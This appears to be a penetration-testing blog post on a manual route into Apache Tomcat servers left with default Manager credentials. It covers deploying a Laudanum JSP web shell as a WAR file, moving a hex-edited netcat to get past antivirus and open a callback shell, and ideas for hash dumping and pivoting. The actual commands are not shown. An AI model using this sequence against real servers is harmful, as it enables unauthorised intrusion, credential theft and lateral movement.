Apache Tomcat is a very popular open source implementation for handling JavaServer Pages. However, Apache Tomcat is often deployed with default or weak credentials protecting the web accessible Tomcat Manager functionality. Tomcat Manager allows administrators (and attackers) to upload and publish Web application ARchive (WAR) files remotely.
A very common initial foothold for attackers is to take advantage of weak or default Tomcat Manager Credentials and use this to remotely deploy and execute a payload to gain a backdoor to the host.
Vulnerability scanners will pick up this particular finding as:
McAfee Vulnerability Manager (MVM): Tomcat Manager Default Or Blank Login Password
Nessus: Apache Tomcat Manager Common Administrative Credentials
The Metasploit exploit (
tomcat_mgr_deploy) is the de facto exploit for this vulnerability and is usually rock solid, however I have seen a few occasions where it will fail with little-to-no explanation. Additionally, the host may have A/V or HIPS that catches the payload and it may be necessary to upload a custom binary or extra special treat manually instead of using MSF to deploy it. The information below is just one possible manual workaround if you don’t have the time to troubleshoot the issue.
Assess the situationIn my scenario:
- Windows 7 (32-bit) development box
- Default Tomcat manager credentials running on port 8081
- UAC enabled
- Tried setting target 2 (for Windows) and we were getting a “500 Internal Server Error” with all payloads <- frustrating…. :|
- Tried automatic target and java payloads—nothing worked!!
The steps and screenshots below illustrate how to deploy an alternative shell and provide a few ideas of what to do—note: these are only ideas; your plan of attack may be different depending on the circumstance.
Download and extract an alternative shellDownload the Laudanum files (which contains the cmd.war file) from here:
According to the SourceForge page:
“Laudanum is a collection of injectable files, designed to be used in a pentest when SQL injection flaws are found and are in multiple languages for different environments. They provide functionality such as shell, DNS query, LDAP retrieval and others.”
Extract and understand the codeThis is always a best practice to try to understand the code. Even if you are not familiar with the language, use Google and try to understand what the code is doing to the best of your abilities. It will help you learn how to effectively use the tool and may identify limitations or areas of concern.
Upload the cmd.warUpload the cmd.war file to the remote server in the “WAR file to deploy” section shown in the screenshot below:
Utilize the JSP shellUtilize the shell (found at
/cmd/cmd.jsp) to run various situational awareness commands
Remember, many commands you are used to running are a function of the command shell and are not individual binaries—such as dir. In this case, execute them by first specifying “
cmd.exe /c [whatever]” (as shown below).
Get file transfer capabilitiesLuckily the developer enabled the tftp client on this Windows 7 host. Wooot!
Upgrade your shellWe could not get a meterpreter shell to execute for some reason. I believe this had to do with UAC and the particular user’s permissions. So we settled for hex edited netcat (which is a step up from the jsp shell).
To transfer (transfer an alternate backdoor to the remote host -- this is a hex edited version of netcat):
Start listener and receive callback (the first command is starting a local listener and the second command is executed on the remote host after the callback succeeds.):
Get creativeThis pivot host can now be used to not only attack the host itself, but also others in the network. You are only limited by the privileges that you can gain and your own imagination. For example, you could upload gsecdump in order to dump hashes, fpipe to portforward other protocols to bypass firewalls, or use Windows native commands in order to datamine and propagate to other hosts. Not the sexiest hack, but it is quite effective.
This article and hack utilized and expanded on an idea from the following blog entry (props and thanks to the author):